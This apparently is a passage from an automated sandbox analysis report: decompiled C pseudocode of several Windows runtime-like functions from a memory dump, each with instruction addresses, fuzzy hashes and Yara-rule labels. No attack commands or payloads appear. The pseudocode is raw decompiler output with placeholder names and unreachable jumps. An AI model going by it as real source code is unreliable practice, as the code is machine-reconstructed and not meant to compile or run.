						_t73 =  *0x16d8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x16d862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x16afb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                0x0160dbe9
                                                0x0160dbf2
                                                0x0160dbf7
                                                0x0160dbf9
                                                0x0160dbfc
                                                0x0160dc00
                                                0x0160dc03
                                                0x0160dc14
                                                0x0160dd54
                                                0x0160dd54
                                                0x0160dd54
                                                0x0160dc18
                                                0x0160dc1d
                                                0x0160dc1d
                                                0x0160dc32
                                                0x0160dc3b
                                                0x0160dc3e
                                                0x0160dc46
                                                0x0160dd5b
                                                0x0160dd62
                                                0x0160dd64
                                                0x0160dd67
                                                0x0160dd69
                                                0x0160dd6b
                                                0x0160dd6e
                                                0x0160dd70
                                                0x0160dd73
                                                0x0160dd73
                                                0x00000000
                                                0x0160dc4c
                                                0x0160dc4e
                                                0x01653ae3
                                                0x01653ae8
                                                0x01653aea
                                                0x0160dce7
                                                0x0160dce9
                                                0x0160dcec
                                                0x0160dcee
                                                0x0160dcf0
                                                0x0160dcf3
                                                0x0160dcf5
                                                0x01653af2
                                                0x01653af5
                                                0x01653af5
                                                0x0160dd06
                                                0x0160dd08
                                                0x0160dd0b
                                                0x0160dd12
                                                0x01653b08
                                                0x0160dd18
                                                0x0160dd18
                                                0x0160dd18
                                                0x0160dd20
                                                0x0160dd23
                                                0x01653b16
                                                0x01653b16
                                                0x0160dd29
                                                0x0160dd2d
                                                0x0160dd36
                                                0x0160dd40
                                                0x0160dd51
                                                0x0160dd51
                                                0x0160dc54
                                                0x0160dc59
                                                0x0160dc59
                                                0x0160dc5e
                                                0x0160dc5e
                                                0x0160dc63
                                                0x0160dc66
                                                0x0160dc6b
                                                0x0160dc78
                                                0x0160dc7b
                                                0x0160dc81
                                                0x0160dc81
                                                0x0160dc83
                                                0x0160dc89
                                                0x00000000
                                                0x00000000
                                                0x0160dd7b
                                                0x0160dd7b
                                                0x0160dc8f
                                                0x0160dc8f
                                                0x0160dc92
                                                0x0160dc99
                                                0x0160dc9f
                                                0x0160dca5
                                                0x0160dcaa
                                                0x0160dcaa
                                                0x0160dcb3
                                                0x0160dcb8
                                                0x0160dcbb
                                                0x0160dcc1
                                                0x0160dccf
                                                0x0160dcd2
                                                0x0160dcd5
                                                0x0160dcd7
                                                0x0160dcda
                                                0x0160dcdc
                                                0x0160dcdc
                                                0x0160dce2
                                                0x0160dce4
                                                0x00000000
                                                0x0160dce4

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab299d9f9a549a1e03e324ceacde5af2c1f4917c18cfe5a178bb804619676ab8
                                                • Instruction ID: 17cfca4d2418f43af526311fad8654454a211e3791e5ec34893d9679af536907
                                                • Opcode Fuzzy Hash: ab299d9f9a549a1e03e324ceacde5af2c1f4917c18cfe5a178bb804619676ab8
                                                • Instruction Fuzzy Hash: 9451B275E01216DFCB1ACFE8C880A9EBBF5FF48350F24825AD955A7384DB70A944CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015FEF40, Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E015FEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E015E9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x775ec21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E015E2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                0x015fef4b
                                                0x015fef4d
                                                0x015fef57
                                                0x015ff0bd
                                                0x015ff0c2
                                                0x015ff0d2
                                                0x015ff0d2
                                                0x015ff0c2
                                                0x015fef5d
                                                0x015fef5f
                                                0x015fef67
                                                0x015fef6a
                                                0x015fef6d
                                                0x015fef74
                                                0x015fef7f
                                                0x015fef82
                                                0x015fef82
                                                0x015fef86
                                                0x015fef88
                                                0x015fef8c
                                                0x015fef8f
                                                0x015fef8f
                                                0x015fef8f
                                                0x00000000
                                                0x015fef91
                                                0x015fef93
                                                0x015fefc4
                                                0x015fefc4
                                                0x015fefc4
                                                0x015fefca
                                                0x015fefd0
                                                0x015ff0a6
                                                0x00000000
                                                0x00000000
                                                0x015ff0af
                                                0x0164bb06
                                                0x0164bb0a
                                                0x015ff0b5
                                                0x015ff0b5
                                                0x015ff0b5
                                                0x015ff0b5
                                                0x00000000
                                                0x015fefd6
                                                0x015fefd9
                                                0x015ff0de
                                                0x015ff0e2
                                                0x015fefdf
                                                0x015fefdf
                                                0x015fefdf
                                                0x015fefe5
                                                0x0164bafc
                                                0x0164bafc
                                                0x015fefe5
                                                0x015fefeb
                                                0x015fefed
                                                0x015ff00f
                                                0x015ff011
                                                0x015ff01a
                                                0x015ff01d
                                                0x015ff021
                                                0x015ff028
                                                0x015ff029
                                                0x015ff029
                                                0x015ff02c
                                                0x00000000
                                                0x015ff02c
                                                0x015feff3
                                                0x015feff9
                                                0x015ff0ea
                                                0x015ff0ed
                                                0x015ff0ef
                                                0x00000000
                                                0x015ff0ef
                                                0x015ff003
                                                0x0164bb12
                                                0x015ff045
                                                0x015ff049
                                                0x015ff051
                                                0x015ff09e
                                                0x015ff0a0
                                                0x015ff0a0
                                                0x015ff09e
                                                0x015ff053
                                                0x015ff064
                                                0x015ff064
                                                0x015ff06b
                                                0x0164bb1a
                                                0x0164bb1a
                                                0x015ff071
                                                0x015ff071
                                                0x015ff07d
                                                0x015ff082
                                                0x015ff08f
                                                0x015ff08f
                                                0x015ff009
                                                0x015ff00d
                                                0x00000000
                                                0x015ff00d
                                                0x015fefd0
                                                0x015fef97
                                                0x015fefa5
                                                0x015fefaa
                                                0x00000000
                                                0x015fefac
                                                0x015fefac
                                                0x015fefac
                                                0x00000000
                                                0x015fefb2
                                                0x015ff036
                                                0x015ff03a
                                                0x015ff040
                                                0x015ff090
                                                0x00000000
                                                0x015ff092
                                                0x015ff042
                                                0x00000000
                                                0x015ff042
                                                0x015fefb7
                                                0x015fefb9
                                                0x015fefbc
                                                0x015fefb0
                                                0x015fefb0
                                                0x00000000
                                                0x015fefbe
                                                0x015fefbe
                                                0x015fefc1
                                                0x00000000
                                                0x015fefc1
                                                0x015fefbc
                                                0x015fefaa
                                                0x015fef91

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                • Instruction ID: f1eac5da63cfe254af0570c937cfc8f1b751d90f6eaaa5ec98b7139640f0b432
                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                • Instruction Fuzzy Hash: 6D51F032A04249ABEB25CB68C0C57AEBBF1FF05314F1881ADC6569B682C375A989C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016B740D, Relevance: .1, Instructions: 141COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E016B740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0163D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0162F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0162F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                0x016b740d
                                                0x016b740d
                                                0x016b7412
                                                0x016b7413
                                                0x016b7416
                                                0x016b7418
                                                0x016b741c
                                                0x016b741f
                                                0x016b7422
                                                0x016b7422
                                                0x016b7428
                                                0x016b742a
                                                0x016b742a
                                                0x016b7451
                                                0x016b7432
                                                0x016b744f
                                                0x016b744f
                                                0x00000000
                                                0x016b7434
                                                0x016b7438
                                                0x016b7443
                                                0x016b7517
                                                0x016b7517
                                                0x016b751a
                                                0x016b7535
                                                0x016b7520
                                                0x016b7527
                                                0x016b752c
                                                0x016b7531
                                                0x016b7533
                                                0x00000000
                                                0x016b7533
                                                0x00000000
                                                0x016b7531
                                                0x016b754b
                                                0x016b754f
                                                0x016b755c
                                                0x016b755c
                                                0x016b755f
                                                0x016b7560
                                                0x016b7561
                                                0x016b7562
                                                0x016b7563
                                                0x016b7568
                                                0x016b756a
                                                0x016b756c
                                                0x016b756d
                                                0x016b756d
                                                0x016b756f
                                                0x016b7572
                                                0x016b7574
                                                0x016b7577
                                                0x016b757c
                                                0x016b757f
                                                0x00000000
                                                0x016b7551
                                                0x016b7551
                                                0x016b7551
                                                0x016b7553
                                                0x016b7553
                                                0x016b7449
                                                0x016b7449
                                                0x016b744c
                                                0x016b744c
                                                0x00000000
                                                0x016b744c
                                                0x016b7443
                                                0x016b750e
                                                0x016b7514
                                                0x016b7514
                                                0x016b7455
                                                0x016b7469
                                                0x016b746d
                                                0x00000000
                                                0x016b7473
                                                0x016b7473
                                                0x016b7476
                                                0x016b7480
                                                0x016b7484
                                                0x016b748e
                                                0x016b7493
                                                0x016b7493
                                                0x016b7496
                                                0x016b7499
                                                0x016b74a1
                                                0x016b74b1
                                                0x016b74b5
                                                0x00000000
                                                0x016b74bb
                                                0x016b74c1
                                                0x016b74c1
                                                0x016b74c4
                                                0x016b74c5
                                                0x016b74c6
                                                0x016b74c7
                                                0x016b74c8
                                                0x016b74cd
                                                0x00000000
                                                0x016b74d3
                                                0x016b74d3
                                                0x016b74d6
                                                0x016b74d8
                                                0x016b74db
                                                0x016b74dd
                                                0x016b74e0
                                                0x016b74e7
                                                0x016b74ee
                                                0x016b74ee
                                                0x016b74f4
                                                0x016b74f9
                                                0x00000000
                                                0x016b74fb
                                                0x016b74fb
                                                0x016b74fd
                                                0x016b7500
                                                0x016b7503
                                                0x016b7505
                                                0x016b7505
                                                0x016b74f9
                                                0x00000000
                                                0x016b74cd
                                                0x016b74b5
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                • Instruction ID: 0ece9be45727e455a88bafa79f38347492455f3c271150d173eb06dbfce9dad7
                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                • Instruction Fuzzy Hash: 05519171500646DFDB16CF18C980A96BBF5FF85304F15C1AAE908DF292E771E986CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01612990, Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E01612990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x16bff00);
				E0163D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x15c1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0162E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x15c1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E016651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x15c166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01612AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E015F6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01612C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E015FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01612AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01612C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01612ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0163D0D1(_t62);
				goto L28;
			}





















                                                0x01612990
                                                0x01612992
                                                0x01612997
                                                0x016129a3
                                                0x016129a6
                                                0x016129ab
                                                0x016129ad
                                                0x016129b2
                                                0x01655c80
                                                0x016129b8
                                                0x016129b8
                                                0x016129bb
                                                0x016129c0
                                                0x016129c5
                                                0x016129c6
                                                0x016129c6
                                                0x016129cb
                                                0x00000000
                                                0x00000000
                                                0x016129cd
                                                0x016129d0
                                                0x016129d9
                                                0x016129db
                                                0x016129dd
                                                0x01612a7f
                                                0x01612a84
                                                0x01612a87
                                                0x01612a89
                                                0x01655ca1
                                                0x01655ca3
                                                0x00000000
                                                0x01612a8f
                                                0x01612a8f
                                                0x00000000
                                                0x01612a8f
                                                0x00000000
                                                0x016129e3
                                                0x016129e3
                                                0x016129e3
                                                0x00000000
                                                0x016129e3
                                                0x016129dd
                                                0x00000000
                                                0x016129db
                                                0x016129e6
                                                0x016129e9
                                                0x016129eb
                                                0x016129ed
                                                0x016129f3
                                                0x016129f5
                                                0x016129f8
                                                0x016129fa
                                                0x01612a97
                                                0x01612a9a
                                                0x01612a9d
                                                0x01612add
                                                0x00000000
                                                0x01612a9f
                                                0x01612aa2
                                                0x01612aa5
                                                0x01612aa8
                                                0x01612aab
                                                0x01655cab
                                                0x01655caf
                                                0x01655cc5
                                                0x01655cda
                                                0x01655cdc
                                                0x01655cdf
                                                0x01655ce5
                                                0x00000000
                                                0x01655ceb
                                                0x01655ced
                                                0x01655cee
                                                0x00000000
                                                0x01655cee
                                                0x01655cb1
                                                0x01655cb4
                                                0x01655cb9
                                                0x01655cbb
                                                0x00000000
                                                0x01655cbd
                                                0x01655cbd
                                                0x00000000
                                                0x01655cbd
                                                0x01655cbb
                                                0x01612ab1
                                                0x01612ab1
                                                0x01612ac4
                                                0x01612ac6
                                                0x01612ac6
                                                0x00000000
                                                0x01612ac6
                                                0x01612aab
                                                0x00000000
                                                0x01612a00
                                                0x01612a09
                                                0x01612a0e
                                                0x01612a21
                                                0x01612a24
                                                0x01612a35
                                                0x01612a3a
                                                0x01612a3d
                                                0x01612a42
                                                0x01612a59
                                                0x01612a59
                                                0x01612a5c
                                                0x01612a5f
                                                0x01612a5f
                                                0x016129fa
                                                0x016129f3
                                                0x01612a64
                                                0x01612a64
                                                0x01612a6b
                                                0x01612a6b
                                                0x01612a6d
                                                0x01612a72
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fe5145ddde4bc27932f7039ab27815ee13da78000d0f56996ca620f34fc91b2
                                                • Instruction ID: 1326c1d82f8e8b674ce2a76acaa43fe66f683bbc7463c153a150de409563ef49
                                                • Opcode Fuzzy Hash: 0fe5145ddde4bc27932f7039ab27815ee13da78000d0f56996ca620f34fc91b2
                                                • Instruction Fuzzy Hash: 4351497290020ADFDF25DF59CC90ADEBBB6BF48350F288159ED116B314C3319952CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01614D3B, Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E01614D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x16dd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0162FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x16d7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0162B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01604620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E015ECCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0162B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0162F380(_t67 + 0xc, 0x15c5138, 0x10) == 0) {
								 *0x16d60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01614F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01614E70(0x16d86b0, 0x1615690, 0, 0) != 0) {
					_t46 = E015ECCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                0x01614d3b
                                                0x01614d4d
                                                0x01614d53
                                                0x01614d58
                                                0x01614d65
                                                0x01614d6c
                                                0x01614d71
                                                0x01614d77
                                                0x01614d7f
                                                0x01614d8c
                                                0x01614d8e
                                                0x01614dad
                                                0x01614db0
                                                0x01614db7
                                                0x01614db8
                                                0x01614db9
